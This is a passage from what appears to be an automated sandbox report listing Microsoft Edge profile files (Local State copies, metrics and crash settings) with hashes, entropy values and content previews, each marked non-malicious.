Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7993af03-b9da-4e6b-a05a-521ccc4de1df.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44710
Entropy (8bit):	6.094538707901729
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kfrKKGf4WxJ/O1EVFWWFN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn4xPN7VLyMV/YoskFoz
MD5:	7B07A7BE2978D0DA9769E1E5EA245338
SHA1:	D8F964594A8F5038DB1BFBF4322FBE298B8BEB91
SHA-256:	D24B580E218983390599D3456EE5B11AA3EEBBA04F49095904D85684393A70F3
SHA-512:	0EDA6237B1F690D3A7A5E715628118AFE1DD2518421471AF769DD754C1CC8D06EF0311A7A3BAC979BF26E50FA3EB693050F08F7FFD5DBED685F88CBBB207EB99
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-675438A1-1944.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.046335876866035554
Encrypted:	false
SSDEEP:	192:YsTU0m5tmTnOAUnYTJxwyB9XCWg0xXTh84NExWIBNkRQc70BhTgnPn8y08Tcm2Rl:5g0UtIzLGEhlQ4P0HgP08T2RGOD
MD5:	E2ECEC8EBA8E2C2EF770A08C88DC575A
SHA1:	B28F00BE609621EE41E7964F4E6F07D133AC97F0
SHA-256:	774DA989F6267EDD4D5F69C2B461033F4E627E7B52C5CEF3A228B527AD96E0A9
SHA-512:	48694D0EE8576F8280EDA48D2A6106E71A0298ABA5EC7B91FC51D3E7DFDDECC300C00D834DC4EF7801F627F65068E0B4F1957D0D5061AEE668E59D3AB62DA0E3
Malicious:	false
Preview:	...@..@...@.....C.].....@...............Pe...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".ijldqh20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-675438A1-BCC.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.047609554285531736
Encrypted:	false
SSDEEP:	192:cFT0m5tmTnOAUZYlJ/7qiRDs0JVFg8XSMIHhEHsBzhEhN7j+TRQ8gf87RPn8y08s:ET0UtIDF6vnhcE1i8tP08T2RGOD
MD5:	F7E19579B9DC87AFCDCAA74358DB82B4
SHA1:	2B15EBEAB52F58430426A917EDAE9938C7BB3E61
SHA-256:	970C25914F0DF3C657E82784DF373DF2DF1D350AE1638C687CC0E8C3652460F2
SHA-512:	E9C7789895E68DE2CC33852521D93404AEB06F2BCF2CB338936386303292C2AD3F9D07E97982E61A566351E2E120E9C59AB699DD04240BA23BDFC2452FC7D1BA
Malicious:	false
Preview:	...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".ijldqh20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.16517681506792
Encrypted:	false
SSDEEP:	3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
MD5:	C847567DEE0317368C1EC824DE025887
SHA1:	554098F22FEA9282FE1AAB35560849CD6FF546B1
SHA-256:	3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
SHA-512:	A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
Malicious:	false
Preview:	sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089568437032055
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k4TKKGf4STtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynJt5b7VLyMV/YoskFoz
MD5:	CE15CD5B0A4FD1CB36AD4537847D75C9
SHA1:	16511DF4A0B2D7475A33C1C7ABB28BE1E3BE02C0
SHA-256:	2FF67C8690BC97C8A14B0AA5C250D6D28F16FCDBD85084AA680B6D80765DD859
SHA-512:	02234E30EB91C4418779DB68F01589D417357157B566E32B1EEE6557F29A48D4674F77327C49FECD2EEAFED135CC240D1AB937CB500982DB2FAB83DB333311F2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24154.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089568437032055
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k4TKKGf4STtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynJt5b7VLyMV/YoskFoz
MD5:	CE15CD5B0A4FD1CB36AD4537847D75C9
SHA1:	16511DF4A0B2D7475A33C1C7ABB28BE1E3BE02C0
SHA-256:	2FF67C8690BC97C8A14B0AA5C250D6D28F16FCDBD85084AA680B6D80765DD859
SHA-512:	02234E30EB91C4418779DB68F01589D417357157B566E32B1EEE6557F29A48D4674F77327C49FECD2EEAFED135CC240D1AB937CB500982DB2FAB83DB333311F2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24164.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089568437032055
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k4TKKGf4STtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynJt5b7VLyMV/YoskFoz
MD5:	CE15CD5B0A4FD1CB36AD4537847D75C9
SHA1:	16511DF4A0B2D7475A33C1C7ABB28BE1E3BE02C0
SHA-256:	2FF67C8690BC97C8A14B0AA5C250D6D28F16FCDBD85084AA680B6D80765DD859
SHA-512:	02234E30EB91C4418779DB68F01589D417357157B566E32B1EEE6557F29A48D4674F77327C49FECD2EEAFED135CC240D1AB937CB500982DB2FAB83DB333311F2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24eb2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089568437032055
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k4TKKGf4STtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynJt5b7VLyMV/YoskFoz
MD5:	CE15CD5B0A4FD1CB36AD4537847D75C9
SHA1:	16511DF4A0B2D7475A33C1C7ABB28BE1E3BE02C0
SHA-256:	2FF67C8690BC97C8A14B0AA5C250D6D28F16FCDBD85084AA680B6D80765DD859
SHA-512:	02234E30EB91C4418779DB68F01589D417357157B566E32B1EEE6557F29A48D4674F77327C49FECD2EEAFED135CC240D1AB937CB500982DB2FAB83DB333311F2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24ec2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089568437032055
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k4TKKGf4STtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynJt5b7VLyMV/YoskFoz
MD5:	CE15CD5B0A4FD1CB36AD4537847D75C9
SHA1:	16511DF4A0B2D7475A33C1C7ABB28BE1E3BE02C0
SHA-256:	2FF67C8690BC97C8A14B0AA5C250D6D28F16FCDBD85084AA680B6D80765DD859
SHA-512:	02234E30EB91C4418779DB68F01589D417357157B566E32B1EEE6557F29A48D4674F77327C49FECD2EEAFED135CC240D1AB937CB500982DB2FAB83DB333311F2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQp:YQ3Kq9X0dMgAEiLIj
MD5:	8549C255650427D618EF18B14DFD2B56
SHA1:	8272585186777B344DB3960DF62B00F570D247F6
SHA-256:	40395D9CA4B65D48DEAC792844A77D4F8051F1CEF30DF561DACFEEED3C3BAE13
SHA-512:	E5BB8A0AD338372635C3629E306604E3DC5A5C26FB5547A3DD7E404E5261630612C07326E7EBF5B47ABAFADE8E555965A1A59A1EECFC496DCDD5003048898A8C
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b1d5d7d3-699f-4aba-a6d2-7712a7cffb9e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44710
Entropy (8bit):	6.094538707901729
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kfrKKGf4WxJ/O1EVFWWFN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn4xPN7VLyMV/YoskFoz
MD5:	7B07A7BE2978D0DA9769E1E5EA245338
SHA1:	D8F964594A8F5038DB1BFBF4322FBE298B8BEB91
SHA-256:	D24B580E218983390599D3456EE5B11AA3EEBBA04F49095904D85684393A70F3
SHA-512:	0EDA6237B1F690D3A7A5E715628118AFE1DD2518421471AF769DD754C1CC8D06EF0311A7A3BAC979BF26E50FA3EB693050F08F7FFD5DBED685F88CBBB207EB99
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d47d22d0-c206-4d31-87ff-942a34325421.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089568437032055
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k4TKKGf4STtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynJt5b7VLyMV/YoskFoz
MD5:	CE15CD5B0A4FD1CB36AD4537847D75C9
SHA1:	16511DF4A0B2D7475A33C1C7ABB28BE1E3BE02C0
SHA-256:	2FF67C8690BC97C8A14B0AA5C250D6D28F16FCDBD85084AA680B6D80765DD859
SHA-512:	02234E30EB91C4418779DB68F01589D417357157B566E32B1EEE6557F29A48D4674F77327C49FECD2EEAFED135CC240D1AB937CB500982DB2FAB83DB333311F2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\de2b6f67-53e2-4245-8702-81d8db73ba0c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44691
Entropy (8bit):	6.0945642127335935
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4klrKKGf4WxreoGDxEpFWEoN7DRo+yM/42cRaLMoskCH:z/Ps+wsI7ynuxKN7VLyMV/YoskFoz
MD5:	303BADDF85791473A5DF0AC677703AD0
SHA1:	645E3E75B59FCB3C0E5041EE6E109F0C305514F6
SHA-256:	D2E6507C7126F7AECD9C803904E56E6C5FD891FCD2108243674E4BEC00D70CD8
